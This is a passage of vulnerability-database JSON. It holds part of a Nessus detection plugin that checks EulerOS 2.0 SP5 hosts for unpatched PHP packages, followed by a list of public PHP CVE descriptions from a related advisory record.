\"CVE-2017-11144\",\n \"CVE-2017-11147\",\n \"CVE-2017-12933\",\n \"CVE-2017-9226\"\n );\n\n script_name(english:\"EulerOS 2.0 SP5 : php (EulerOS-SA-2019-2221)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the php packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25\n and 7.x before 7.0.10 mishandles certain invalid\n objects, which allows remote attackers to cause a\n denial of service or possibly have unspecified other\n impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method\n call.(CVE-2016-7124)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP\n before 5.5.32, 5.6.x before 5.6.18, and 7.x before\n 7.0.3 allows remote attackers to cause a denial of\n service (application crash) or possibly have\n unspecified other impact via a crafted TAR\n archive.(CVE-2016-2554)\n\n - A flaw was discovered in the way PHP performed object\n unserialization. Specially crafted input processed by\n the unserialize() function could cause a PHP\n application to crash or, possibly, execute arbitrary\n code.(CVE-2015-6831)\n\n - The sapi_header_op function in main/SAPI.c in PHP\n before 5.4.38, 5.5.x before 5.5.22, and 5.6.x before\n 5.6.6 supports deprecated line folding without\n considering browser compatibility, which allows remote\n attackers to conduct cross-site scripting (XSS) attacks\n against Internet Explorer by leveraging (1) %0A%20 or\n (2) %0D%0A%20 mishandling in the header\n function.(CVE-2015-8935)\n\n - The openssl_random_pseudo_bytes function in\n ext/openssl/openssl.c in PHP before 5.4.44, 5.5.x\n before 5.5.28, and 5.6.x before 5.6.12 incorrectly\n relies on the deprecated RAND_pseudo_bytes function,\n which makes it easier for remote attackers to defeat\n cryptographic protection mechanisms via unspecified\n vectors.(CVE-2015-8867)\n\n - Use-after-free vulnerability in the SPL unserialize\n implementation in ext/spl/spl_array.c in PHP before\n 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12\n allows remote attackers to execute arbitrary code via\n crafted serialized data that triggers misuse of an\n array field.(CVE-2015-6832)\n\n - Directory traversal vulnerability in the PharData class\n in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x\n before 5.6.12 allows remote attackers to write to\n arbitrary files via a .. (dot dot) in a ZIP archive\n entry that is mishandled during an extractTo\n call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the\n ZipArchive::extractTo function in ext/zip/php_zip.c in\n PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x\n before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before\n 3.12.1 allows remote attackers to create arbitrary\n empty directories via a crafted ZIP\n archive.(CVE-2014-9767)\n\n - The ZIP signature-verification feature in PHP before\n 5.6.26 and 7.x before 7.0.11 does not ensure that the\n uncompressed_filesize field is large enough, which\n allows remote attackers to cause a denial of service\n (out-of-bounds memory access) or possibly have\n unspecified other impact via a crafted PHAR archive,\n related to ext/phar/util.c and\n ext/phar/zip.c.(CVE-2016-7414)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before\n 7.0.13 allows remote attackers to cause a denial of\n service (NULL pointer dereference) via crafted\n serialized data in a wddxPacket XML document, as\n demonstrated by a PDORow string.(CVE-2016-9934)\n\n - The php_wddx_push_element function in ext/wddx/wddx.c\n in PHP before 5.6.29 and 7.x before 7.0.14 allows\n remote attackers to cause a denial of service\n (out-of-bounds read and memory corruption) or possibly\n have unspecified other impact via an empty boolean\n element in a wddxPacket XML document.(CVE-2016-9935)\n\n - In PHP before 5.6.31, an invalid free in the WDDX\n deserialization of boolean parameters could be used by\n attackers able to inject XML for deserialization to\n crash the PHP interpreter, related to an invalid free\n for an empty boolean element in\n ext/wddx/wddx.c.(CVE-2017-11143)\n\n - Integer overflow in the php_html_entities function in\n ext/standard/html.c in PHP before 5.5.36 and 5.6.x\n before 5.6.22 allows remote attackers to cause a denial\n of service or possibly have unspecified other impact by\n triggering a large output string from the\n htmlspecialchars function.(CVE-2016-5094)\n\n - The get_icu_value_internal function in\n ext/intl/locale/locale_methods.c in PHP before 5.5.36,\n 5.6.x before 5.6.22, and 7.x before 7.0.7 does not\n ensure the presence of a '\\0' character, which allows\n remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a crafted locale_get_primary_language\n call.(CVE-2016-5093)\n\n - The grapheme_strpos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4541)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 does not properly construct spprintf arguments,\n which allows remote attackers to cause a denial of\n service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4542)\n\n - The phar_parse_zipfile function in zip.c in the PHAR\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service\n (out-of-bounds read and application crash) by placing a\n PK\\x05\\x06 signature at an invalid\n location.(CVE-2016-3142)\n\n - ** DISPUTED ** Integer overflow in the\n php_raw_url_encode function in ext/standard/url.c in\n PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before\n 7.0.5 allows remote attackers to cause a denial of\n service (application crash) via a long string to the\n rawurlencode function. NOTE: the vendor says 'Not sure\n if this qualifies as security issue (probably\n not).'(CVE-2016-4070)\n\n - The xml_parse_into_struct function in ext/xml/xml.c in\n PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before\n 7.0.6 allows remote attackers to cause a denial of\n service (buffer under-read and segmentation fault) or\n possibly have unspecified other impact via crafted XML\n data in the second argument, leading to a parser level\n of zero.(CVE-2016-4539)\n\n - The grapheme_stripos function in\n ext/intl/grapheme/grapheme_string.c in PHP before\n 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6\n allows remote attackers to cause a denial of service\n (out-of-bounds read) or possibly have unspecified other\n impact via a negative offset.(CVE-2016-4540)\n\n - Use-after-free vulnerability in wddx.c in the WDDX\n extension in PHP before 5.5.33 and 5.6.x before 5.6.19\n allows remote attackers to cause a denial of service\n (memory corruption and application crash) or possibly\n have unspecified other impact by triggering a\n wddx_deserialize call on XML data containing a crafted\n var element.(CVE-2016-3141)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR\n archive handler could be used by attackers supplying\n malicious archive files to crash the PHP interpreter or\n potentially disclose information due to a buffer\n over-read in the phar_parse_pharfile function in\n ext/phar/phar.c.(CVE-2017-11147)\n\n - The exif_process_IFD_in_JPEG function in\n ext/exif/exif.c in PHP before 5.5.35, 5.6.x before\n 5.6.21, and 7.x before 7.0.6 does not validate IFD\n sizes, which allows remote attackers to cause a denial\n of service (out-of-bounds read) or possibly have\n unspecified other impact via crafted header\n data.(CVE-2016-4543)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in\n PHP before 5.6.12 mishandles driver behavior for\n SQL_WVARCHAR columns, which allows remote attackers to\n cause a denial of service (application crash) in\n opportunistic circumstances by leveraging use of the\n odbc_fetch_array function to access a certain type of\n Microsoft SQL Server table.(CVE-2015-8879)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in\n Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP\n through 7.1.5. A heap out-of-bounds write or read\n occurs in next_state_val() during regular expression\n compilation. Octal numbers larger than 0xff are not\n handled correctly in fetch_token() and\n fetch_token_in_cc(). A malformed regular expression\n containing an octal number in the form of '\\700' would\n produce an invalid code point value larger than 0xff in\n next_state_val(), resulting in an out-of-bounds write\n memory corruption.(CVE-2017-9226)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x\n before 7.1.7, the openssl extension PEM sealing code\n did not check the return value of the OpenSSL sealing\n function, which could lead to a crash of the PHP\n interpreter, related to an interpretation conflict for\n a negative number in ext/openssl/openssl.c, and an\n OpenSSL documentation omission.(CVE-2017-11144)\n\n - The make_http_soap_request function in\n ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before\n 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4\n allows remote attackers to obtain sensitive information\n from process memory or cause a denial of service (type\n confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method\n in ext/soap/soap.c.(CVE-2016-3185)\n\n - The object_common1 function in\n ext/standard/var_unserializer.c in PHP before 5.6.30,\n 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows\n remote attackers to cause a denial of service (buffer\n over-read and application crash) via crafted serialized\n data that is mishandled in a finish_nested_data\n call.(CVE-2016-10161)\n\n - The finish_nested_data function in\n ext/standard/var_unserializer.re in PHP before 5.6.31,\n 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to\n a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified\n impact on the integrity of PHP.(CVE-2017-12933)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-2221\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ce72047f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(5)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP5\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"php-5.4.16-45.h19.eulerosv2r7\",\n \"php-cli-5.4.16-45.h19.eulerosv2r7\",\n \"php-common-5.4.16-45.h19.eulerosv2r7\",\n \"php-gd-5.4.16-45.h19.eulerosv2r7\",\n \"php-ldap-5.4.16-45.h19.eulerosv2r7\",\n \"php-mysql-5.4.16-45.h19.eulerosv2r7\",\n \"php-odbc-5.4.16-45.h19.eulerosv2r7\",\n \"php-pdo-5.4.16-45.h19.eulerosv2r7\",\n \"php-pgsql-5.4.16-45.h19.eulerosv2r7\",\n \"php-process-5.4.16-45.h19.eulerosv2r7\",\n \"php-recode-5.4.16-45.h19.eulerosv2r7\",\n \"php-soap-5.4.16-45.h19.eulerosv2r7\",\n \"php-xml-5.4.16-45.h19.eulerosv2r7\",\n \"php-xmlrpc-5.4.16-45.h19.eulerosv2r7\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"5\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-17T15:30:21", "description": "According to the versions of the php packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - ** DISPUTED ** Integer overflow in the php_raw_url_encode function in ext/standard/url.c in PHP before 5.5.34, 5.6.x before 5.6.20, and 7.x before 7.0.5 allows remote attackers to cause a denial of service (application crash) via a long string to the rawurlencode function. NOTE: the vendor says 'Not sure if this qualifies as security issue (probably not).'(CVE-2016-4070)\n\n - An issue was discovered in ext/phar/phar_object.c in PHP before 5.6.36, 7.0.x before 7.0.30, 7.1.x before 7.1.17, and 7.2.x before 7.2.5. There is Reflected XSS on the PHAR 403 and 404 error pages via request data of a request for a .phar file. NOTE: this vulnerability exists because of an incomplete fix for CVE-2018-5712.(CVE-2018-10547)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write occurs in bitset_set_range() during regular expression compilation due to an uninitialized variable from an incorrect state transition. An incorrect state transition in parse_char_class() could create an execution path that leaves a critical local variable uninitialized until it's used as an index, resulting in an out-of-bounds write memory corruption.(CVE-2017-9228)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A heap out-of-bounds write or read occurs in next_state_val() during regular expression compilation. Octal numbers larger than 0xff are not handled correctly in fetch_token() and fetch_token_in_cc(). A malformed regular expression containing an octal number in the form of '\\700' would produce an invalid code point value larger than 0xff in next_state_val(), resulting in an out-of-bounds write memory corruption.(CVE-2017-9226)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A SIGSEGV occurs in left_adjust_char_head() during regular expression compilation. Invalid handling of reg->dmax in forward_search_range() could result in an invalid pointer dereference, normally as an immediate denial-of-service condition.(CVE-2017-9229)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in match_at() during regular expression searching. A logical error involving order of validation and access in match_at() could result in an out-of-bounds read from a stack buffer.(CVE-2017-9224)\n\n - An issue was discovered in Oniguruma 6.2.0, as used in Oniguruma-mod in Ruby through 2.4.1 and mbstring in PHP through 7.1.5. A stack out-of-bounds read occurs in mbc_enc_len() during regular expression searching.\n Invalid handling of reg->dmin in forward_search_range() could result in an invalid pointer dereference, as an out-of-bounds read from a stack buffer.(CVE-2017-9227)\n\n - An issue was discovered in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1. There is Reflected XSS on the PHAR 404 error page via the URI of a request for a .phar file.(CVE-2018-5712)\n\n - An issue was discovered in PHP before 5.6.35, 7.0.x before 7.0.29, 7.1.x before 7.1.16, and 7.2.x before 7.2.4. Dumpable FPM child processes allow bypassing opcache access controls because fpm_unix.c makes a PR_SET_DUMPABLE prctl call, allowing one user (in a multiuser environment) to obtain sensitive information from the process memory of a second user's PHP applications by running gcore on the PID of the PHP-FPM worker process.(CVE-2018-10545)\n\n - Directory traversal vulnerability in the PharData class in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allows remote attackers to write to arbitrary files via a .. (dot dot) in a ZIP archive entry that is mishandled during an extractTo call.(CVE-2015-6833)\n\n - Directory traversal vulnerability in the ZipArchive::extractTo function in ext/zip/php_zip.c in PHP before 5.4.45, 5.5.x before 5.5.29, and 5.6.x before 5.6.13 and ext/zip/ext_zip.cpp in HHVM before 3.12.1 allows remote attackers to create arbitrary empty directories via a crafted ZIP archive.(CVE-2014-9767)\n\n - exif_process_IFD_in_MAKERNOTE in ext/exif/exif.c in PHP before 5.6.37, 7.0.x before 7.0.31, 7.1.x before 7.1.20, and 7.2.x before 7.2.8 allows remote attackers to cause a denial of service (out-of-bounds read and application crash) via a crafted JPEG file.(CVE-2018-14851)\n\n - ext/libxml/libxml.c in PHP before 5.5.22 and 5.6.x before 5.6.6, when PHP-FPM is used, does not isolate each thread from libxml_disable_entity_loader changes in other threads, which allows remote attackers to conduct XML External Entity (XXE) and XML Entity Expansion (XEE) attacks via a crafted XML document, a related issue to CVE-2015-5161.(CVE-2015-8866)\n\n - ext/mysqlnd/mysqlnd_wireprotocol.c in PHP before 5.6.26 and 7.x before 7.0.11 does not verify that a BIT field has the UNSIGNED_FLAG flag, which allows remote MySQL servers to cause a denial of service (heap-based buffer overflow) or possibly have unspecified other impact via crafted field metadata.(CVE-2016-7412)\n\n - ext/session/session.c in PHP before 5.6.25 and 7.x before 7.0.10 skips invalid session names in a way that triggers incorrect parsing, which allows remote attackers to inject arbitrary-type session data by leveraging control of a session name, as demonstrated by object injection.(CVE-2016-7125)\n\n - ext/standard/var_unserializer.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles certain invalid objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via crafted serialized data that leads to a (1)\n __destruct call or (2) magic method call.(CVE-2016-7124)\n\n - ext/standard/var_unserializer.re in PHP before 5.6.26 mishandles object-deserialization failures, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via an unserialize call that references a partially constructed object.(CVE-2016-7411)\n\n - ext/wddx/wddx.c in PHP before 5.6.28 and 7.x before 7.0.13 allows remote attackers to cause a denial of service (NULL pointer dereference) via crafted serialized data in a wddxPacket XML document, as demonstrated by a PDORow string.(CVE-2016-9934)\n\n - gd_gif_in.c in the GD Graphics Library (aka libgd), as used in PHP before 5.6.33, 7.0.x before 7.0.27, 7.1.x before 7.1.13, and 7.2.x before 7.2.1, has an integer signedness error that leads to an infinite loop via a crafted GIF file, as demonstrated by a call to the imagecreatefromgif or imagecreatefromstring PHP function. This is related to GetCode_ and gdImageCreateFromGifCtx.(CVE-2018-5711)\n\n - In PHP before 5.6.28 and 7.x before 7.0.13, incorrect handling of various URI components in the URL parser could be used by attackers to bypass hostname-specific URL checks, as demonstrated by evil.example.com:80#@good.example.com/ and evil.example.com:80?@good.example.com/ inputs to the parse_url function (implemented in the php_url_parse_ex function in ext/standard/url.c).(CVE-2016-10397)\n\n - In PHP before 5.6.30 and 7.x before 7.0.15, the PHAR archive handler could be used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function in ext/phar/phar.c.(CVE-2017-11147)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, a stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could cause a denial of service or potentially allow executing code. NOTE: this is only relevant for PHP applications that accept untrusted input (instead of the system's php.ini file) for the parse_ini_string or parse_ini_file function, e.g., a web application for syntax validation of php.ini directives.(CVE-2017-11628)\n\n - In PHP before 5.6.31, 7.x before 7.0.21, and 7.1.x before 7.1.7, the openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could lead to a crash of the PHP interpreter, related to an interpretation conflict for a negative number in ext/openssl/openssl.c, and an OpenSSL documentation omission.(CVE-2017-11144)\n\n - In PHP before 5.6.31, an invalid free in the WDDX deserialization of boolean parameters could be used by attackers able to inject XML for deserialization to crash the PHP interpreter, related to an invalid free for an empty boolean element in ext/wddx/wddx.c.(CVE-2017-11143)\n\n - In PHP before 5.6.32, 7.x before 7.0.25, and 7.1.x before 7.1.11, an error in the date extension's timelib_meridian handling of 'front of' and 'back of' directives could be used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function. NOTE: this is a different issue than CVE-2017-11145.(CVE-2017-16642)\n\n - In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11 in certain configurations of FPM setup it is possible to cause FPM module to write past allocated buffers into the space reserved for FCGI protocol data, thus opening the possibility of remote code execution.(CVE-2019-11043)\n\n - Integer overflow in the phar_parse_pharfile function in ext/phar/phar.c in PHP before 5.6.30 and 7.0.x before 7.0.15 allows remote attackers to cause a denial of service (memory consumption or application crash) via a truncated manifest entry in a PHAR archive.(CVE-2016-10159)\n\n - Integer overflow in the php_html_entities function in ext/standard/html.c in PHP before 5.5.36 and 5.6.x before 5.6.22 allows remote attackers to cause a denial of service or possibly have unspecified other impact by triggering a large output string from the htmlspecialchars function.(CVE-2016-5094)\n\n - Multiple use-after-free vulnerabilities in SPL in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 allow remote attackers to execute arbitrary code via vectors involving (1) ArrayObject, (2) SplObjectStorage, and (3) SplDoublyLinkedList, which are mishandled during unserialization.(CVE-2015-6831)\n\n - Off-by-one error in the phar_parse_zipfile function in ext/phar/zip.c in PHP before 5.5.30 and 5.6.x before 5.6.14 allows remote attackers to cause a denial of service (uninitialized pointer dereference and application crash) by including the / filename in a .zip PHAR archive.(CVE-2015-7804)\n\n - PHP through 7.1.11 enables potential SSRF in applications that accept an fsockopen or pfsockopen hostname argument with an expectation that the port number is constrained. Because a :port syntax is recognized, fsockopen will use the port number that is specified in the hostname argument, instead of the port number in the second argument of the function.(CVE-2017-7272)\n\n - Session fixation vulnerability in the Sessions subsystem in PHP before 5.5.2 allows remote attackers to hijack web sessions by specifying a session ID.(CVE-2011-4718)\n\n - Stack consumption vulnerability in GD in PHP before 5.6.12 allows remote attackers to cause a denial of service via a crafted imagefilltoborder call.(CVE-2015-8874)\n\n - Stack-based buffer overflow in ext/phar/tar.c in PHP before 5.5.32, 5.6.x before 5.6.18, and 7.x before 7.0.3 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted TAR archive.(CVE-2016-2554)\n\n - The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a 'Transfer-Encoding:\n chunked' request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.(CVE-2018-17082)\n\n - The exif_convert_any_to_int function in ext/exif/exif.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (application crash) via crafted EXIF data that triggers an attempt to divide the minimum representable negative integer by -1.(CVE-2016-10158)\n\n - The exif_process_IFD_in_JPEG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not validate IFD sizes, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4543)\n\n - The exif_process_IFD_in_MAKERNOTE function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (out-of-bounds array access and memory corruption), obtain sensitive information from process memory, or possibly have unspecified other impact via a crafted JPEG image.(CVE-2016-6291)\n\n - The exif_process_IFD_in_TIFF function in ext/exif/exif.c in PHP before 5.6.25 and 7.x before 7.0.10 mishandles the case of a thumbnail offset that exceeds the file size, which allows remote attackers to obtain sensitive information from process memory via a crafted TIFF image.(CVE-2016-7128)\n\n - The exif_process_IFD_TAG function in ext/exif/exif.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 does not properly construct spprintf arguments, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via crafted header data.(CVE-2016-4542)\n\n - The exif_process_user_comment function in ext/exif/exif.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 allows remote attackers to cause a denial of service (NULL pointer dereference and application crash) via a crafted JPEG image.(CVE-2016-6292)\n\n - The finish_nested_data function in ext/standard/var_unserializer.re in PHP before 5.6.31, 7.0.x before 7.0.21, and 7.1.x before 7.1.7 is prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue can have an unspecified impact on the integrity of PHP.(CVE-2017-12933)\n\n - The get_icu_disp_value_src_php function in ext/intl/locale/locale_methods.c in PHP before 5.3.29, 5.4.x before 5.4.30, and 5.5.x before 5.5.14 does not properly restrict calls to the ICU uresbund.cpp component, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a locale_get_display_name call with a long first argument.(CVE-2014-9912)\n\n - The get_icu_value_internal function in ext/intl/locale/locale_methods.c in PHP before 5.5.36, 5.6.x before 5.6.22, and 7.x before 7.0.7 does not ensure the presence of a '\\0' character, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a crafted locale_get_primary_language call.(CVE-2016-5093)\n\n - The grapheme_stripos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4540)\n\n - The grapheme_strpos function in ext/intl/grapheme/grapheme_string.c in PHP before 5.5.35, 5.6.x before 5.6.21, and 7.x before 7.0.6 allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a negative offset.(CVE-2016-4541)\n\n - The locale_accept_from_http function in ext/intl/locale/locale_methods.c in PHP before 5.5.38, 5.6.x before 5.6.24, and 7.x before 7.0.9 does not properly restrict calls to the ICU uloc_acceptLanguageFromHTTP function, which allows remote attackers to cause a denial of service (out-of-bounds read) or possibly have unspecified other impact via a call with a long argument.(CVE-2016-6294)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, 5.6.x before 5.6.12, and 7.x before 7.0.4 allows remote attackers to obtain sensitive information from process memory or cause a denial of service (type confusion and application crash) via crafted serialized\n _cookies data, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2016-3185)\n\n - The make_http_soap_request function in ext/soap/php_http.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x before 5.6.12 does not properly retrieve keys, which allows remote attackers to cause a denial of service (NULL pointer dereference, type confusion, and application crash) or possibly execute arbitrary code via crafted serialized data representing a numerically indexed _cookies array, related to the SoapClient::__call method in ext/soap/soap.c.(CVE-2015-8835)\n\n - The object_common1 function in ext/standard/var_unserializer.c in PHP before 5.6.30, 7.0.x before 7.0.15, and 7.1.x before 7.1.1 allows remote attackers to cause a denial of service (buffer over-read and application crash) via crafted serialized data that is mishandled in a finish_nested_data call.(CVE-2016-10161)\n\n - The odbc_bindcols function in ext/odbc/php_odbc.c in PHP before 5.6.12 mishandles driver behavior for SQL_WVARCHAR columns, which allows remote attackers to cause a denial of service (application crash) in opportunistic circumstances by leveraging use of the odbc_fetch_array function to access a certain type of Microsoft SQL Server table.(CVE-2015-8879)\n\n - The phar_convert_to_other function in ext/phar/phar_object.c in PHP before 5.4.43, 5.5.x before 5.5.27, and 5.6.x before 5.6.11 does not validate a file pointer before a close operation, which allows remote attackers to cause a denial of service (segmentation fault) 